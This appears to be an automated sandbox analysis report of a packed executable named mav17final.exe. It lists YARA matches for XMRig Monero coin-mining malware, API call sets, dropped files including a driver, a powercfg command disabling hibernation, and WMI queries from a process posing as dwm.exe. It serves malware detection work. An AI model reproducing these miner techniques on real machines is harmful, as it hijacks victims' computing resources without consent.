      Source: mav17final.exe, 00000002.00000003.1996176454.0000018717946000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995683640.00000187178CF000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1995683640.0000018717935000.00000004.00000020.00020000.00000000.sdmp, mav17final.exe, 00000002.00000002.2063485010.00000187176C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/4457745#4457745
      Source: mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.openssl.org/H
      Source: mav17final.exe, 00000002.00000002.2062169744.0000018717180000.00000004.00001000.00020000.00000000.sdmp, mav17final.exe, 00000002.00000003.1992629255.000001871762E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.python.org/download/releases/2.3/mro/.
      Source: mav17final.exe, 00000002.00000002.2069042978.00007FF8A8D88000.00000004.00000001.01000000.00000004.sdmpString found in binary or memory: https://www.python.org/psf/license/
      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705

      System Summary

      barindex
      Malicious sample detected (through community Yara rule)
      Source: 66.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
      Source: 66.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
      Source: 66.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
      Source: 00000042.00000002.3235461112.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
      Uses powercfg.exe to modify the power settings
      Source: C:\Users\user\AppData\Local\Temp\dialer.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9077910 NtQuerySystemInformation,2_2_00007FF8B9077910
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9072370 GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,2_2_00007FF8B9072370
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9074B90 GetActiveProcessorCount,fprintf,fprintf,fprintf,NtQuerySystemInformation,2_2_00007FF8B9074B90
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9076B00 GetProcessHeap,HeapAlloc,GetFileType,SetLastError,NtQueryObject,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,2_2_00007FF8B9076B00
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9072730 OpenProcess,GetLastError,GetProcessHeap,HeapAlloc,NtQueryVirtualMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQueryVirtualMemory,CloseHandle,GetProcessHeap,HeapFree,CloseHandle,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,2_2_00007FF8B9072730
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9072B30 OpenProcess,GetLastError,NtSuspendProcess,NtResumeProcess,CloseHandle,2_2_00007FF8B9072B30
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9077350 OpenProcess,GetLastError,NtQueryInformationProcess,RtlNtStatusToDosErrorNoTeb,CloseHandle,ReadProcessMemory,GetLastError,CloseHandle,ReadProcessMemory,NtQueryInformationProcess,CloseHandle,ReadProcessMemory,ReadProcessMemory,VirtualQueryEx,GetLastError,CloseHandle,CloseHandle,ReadProcessMemory,GetLastError,CloseHandle,CloseHandle,2_2_00007FF8B9077350
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9073560 OpenProcess,GetLastError,NtQueryInformationProcess,CloseHandle,2_2_00007FF8B9073560
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9073660 OpenProcess,GetLastError,NtSetInformationProcess,CloseHandle,2_2_00007FF8B9073660
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9075160 GetActiveProcessorCount,fprintf,fprintf,fprintf,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation,2_2_00007FF8B9075160
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9076EB0 EnterCriticalSection,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,NtQuerySystemInformation,GetProcessHeap,HeapFree,GetCurrentProcess,DuplicateHandle,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,LeaveCriticalSection,2_2_00007FF8B9076EB0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90776F0 OpenProcess,GetLastError,NtQueryInformationProcess,CloseHandle,CloseHandle,CloseHandle,NtQueryInformationProcess,CloseHandle,CloseHandle,2_2_00007FF8B90776F0
      Source: C:\Windows\System32\conhost.exeCode function: 64_2_0000000140001394 NtAlpcCreatePort,64_2_0000000140001394
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9075750: swprintf_s,CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,swprintf_s,CloseHandle,GetLastError,fprintf,fprintf,fprintf,GetLastError,fprintf,CloseHandle,2_2_00007FF8B9075750
      Source: C:\ProgramData\dialer.exeFile created: C:\Windows\TEMP\ujjtjyeszdwn.sys
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_fmmoe5wr.s0x.ps1
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA617BC0_2_00007FF79EA617BC
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA478500_2_00007FF79EA47850
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA615280_2_00007FF79EA61528
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA5C4480_2_00007FF79EA5C448
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA53A640_2_00007FF79EA53A64
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA41F500_2_00007FF79EA41F50
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA61F300_2_00007FF79EA61F30
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA5C4480_2_00007FF79EA5C448
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA650A80_2_00007FF79EA650A8
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA4A02C0_2_00007FF79EA4A02C
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA5F5D00_2_00007FF79EA5F5D0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA51E100_2_00007FF79EA51E10
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA4FDFC0_2_00007FF79EA4FDFC
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA48ED00_2_00007FF79EA48ED0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA55EE00_2_00007FF79EA55EE0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA53A640_2_00007FF79EA53A64
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA5D3540_2_00007FF79EA5D354
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA4A3380_2_00007FF79EA4A338
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA4FB940_2_00007FF79EA4FB94
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA5A3580_2_00007FF79EA5A358
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA57C500_2_00007FF79EA57C50
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA614440_2_00007FF79EA61444
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA5F9FC0_2_00007FF79EA5F9FC
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA5994C0_2_00007FF79EA5994C
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA4996D0_2_00007FF79EA4996D
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA49B040_2_00007FF79EA49B04
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA542E80_2_00007FF79EA542E8
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9074B902_2_00007FF8B9074B90
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90720302_2_00007FF8B9072030
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9072C202_2_00007FF8B9072C20
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90757502_2_00007FF8B9075750
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9076EB02_2_00007FF8B9076EB0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90763A02_2_00007FF8B90763A0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9075AC02_2_00007FF8B9075AC0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9073AE02_2_00007FF8B9073AE0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90793E02_2_00007FF8B90793E0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90912B02_2_00007FF8B90912B0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9096EAC2_2_00007FF8B9096EAC
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90925302_2_00007FF8B9092530
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9098D402_2_00007FF8B9098D40
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B909F81C2_2_00007FF8B909F81C
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9095CE02_2_00007FF8B9095CE0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9091BB02_2_00007FF8B9091BB0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90953A02_2_00007FF8B90953A0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9092FF02_2_00007FF8B9092FF0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90C10002_2_00007FF8B90C1000
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90C3E602_2_00007FF8B90C3E60
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90C2EB02_2_00007FF8B90C2EB0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90C3BD02_2_00007FF8B90C3BD0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90C60C02_2_00007FF8B90C60C0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90CC7D82_2_00007FF8B90CC7D8
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B93C10602_2_00007FF8B93C1060
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9F632002_2_00007FF8B9F63200
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8BA2477782_2_00007FF8BA247778
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8BA2496202_2_00007FF8BA249620
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8BFAB27A02_2_00007FF8BFAB27A0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8BFAB39F02_2_00007FF8BFAB39F0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8BFAB32E02_2_00007FF8BFAB32E0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8BFAB2ED02_2_00007FF8BFAB2ED0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8BFAB3F502_2_00007FF8BFAB3F50
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8BFAB1F502_2_00007FF8BFAB1F50
      Source: C:\Windows\System32\conhost.exeCode function: 64_2_000000014000327064_2_0000000140003270
      Source: C:\Windows\System32\conhost.exeCode function: 64_2_00000001400027D064_2_00000001400027D0
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\_MEI19682\VCRUNTIME140.dll A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\_MEI19682\_bz2.pyd A4DD883257A7ACE84F96BCC6CD59E22D843D0DB080606DEFAE32923FC712C75A
      Source: C:\Users\user\Desktop\mav17final.exeCode function: String function: 00007FF8B9071070 appears 43 times
      Source: C:\Users\user\Desktop\mav17final.exeCode function: String function: 00007FF79EA42B30 appears 47 times
      Source: C:\Users\user\Desktop\mav17final.exeCode function: String function: 00007FF8B90717D0 appears 41 times
      Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: mav17final.exe, 00000000.00000003.1985001146.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs mav17final.exe
      Source: mav17final.exe, 00000000.00000003.1987062417.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs mav17final.exe
      Source: mav17final.exe, 00000000.00000003.1984118002.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs mav17final.exe
      Source: mav17final.exe, 00000000.00000003.1985418927.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs mav17final.exe
      Source: mav17final.exe, 00000000.00000003.1985128419.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs mav17final.exe
      Source: mav17final.exe, 00000000.00000003.1989365562.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs mav17final.exe
      Source: mav17final.exe, 00000000.00000003.1983941024.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs mav17final.exe
      Source: mav17final.exe, 00000000.00000003.1989557906.000001F87EF84000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs mav17final.exe
      Source: mav17final.exe, 00000000.00000003.1984841967.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_elementtree.pyd. vs mav17final.exe
      Source: mav17final.exe, 00000000.00000003.1987455616.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs mav17final.exe
      Source: mav17final.exe, 00000000.00000003.1984475482.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs mav17final.exe
      Source: mav17final.exe, 00000000.00000003.1985268700.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs mav17final.exe
      Source: mav17final.exe, 00000000.00000003.1984651220.000001F87EF83000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_decimal.pyd. vs mav17final.exe
      Source: mav17final.exeBinary or memory string: OriginalFilename vs mav17final.exe
      Source: mav17final.exe, 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs mav17final.exe
      Source: mav17final.exe, 00000002.00000002.2072844987.00007FF8B90B5000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs mav17final.exe
      Source: mav17final.exe, 00000002.00000002.2072449949.00007FF8A8F27000.00000002.00000001.01000000.00000004.sdmpBinary or memory string: OriginalFilenamepython311.dll. vs mav17final.exe
      Source: mav17final.exe, 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmpBinary or memory string: OriginalFilename_ctypes.pyd. vs mav17final.exe
      Source: mav17final.exe, 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmpBinary or memory string: OriginalFilename_bz2.pyd. vs mav17final.exe
      Source: mav17final.exe, 00000002.00000002.2073189700.00007FF8B93D2000.00000002.00000001.01000000.00000008.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs mav17final.exe
      Source: mav17final.exe, 00000002.00000002.2073339457.00007FF8B9846000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs mav17final.exe
      Source: 66.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
      Source: 66.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
      Source: 66.2.dwm.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
      Source: 00000042.00000002.3235461112.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
      Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@100/36@1/2
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 0_2_00007FF79EA48460 GetLastError,FormatMessageW,WideCharToMultiByte,0_2_00007FF79EA48460
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90782E0 GetCurrentProcess,OpenProcessToken,GetLastError,ImpersonateSelf,OpenProcessToken,GetLastError,LookupPrivilegeValueA,GetLastError,AdjustTokenPrivileges,GetLastError,AdjustTokenPrivileges,RevertToSelf,FindCloseChangeNotification,2_2_00007FF8B90782E0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B90756B0 GetDiskFreeSpaceExW,2_2_00007FF8B90756B0
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9072C20 CreateToolhelp32Snapshot,CloseHandle,CloseHandle,Thread32First,OpenThread,GetThreadTimes,CloseHandle,Thread32Next,CloseHandle,2_2_00007FF8B9072C20
      Source: C:\Users\user\Desktop\mav17final.exeCode function: 2_2_00007FF8B9078F50 StartServiceA,CloseServiceHandle,CloseServiceHandle,2_2_00007FF8B9078F50
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1076:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6076:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2944:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6088:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2076:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1200:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6772:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3380:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:320:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1360:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4320:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5980:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5084:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3664:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1276:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6432:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:5544:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6408:120:WilError_03
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6504:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1520:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:7060:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3140:120:WilError_03
      Source: C:\Windows\System32\dwm.exeMutant created: \BaseNamedObjects\Global\genqhuyafccnswcc
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4720:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_03
      Source: C:\Users\user\Desktop\mav17final.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI19682Jump to behavior
      Source: mav17final.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
      Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
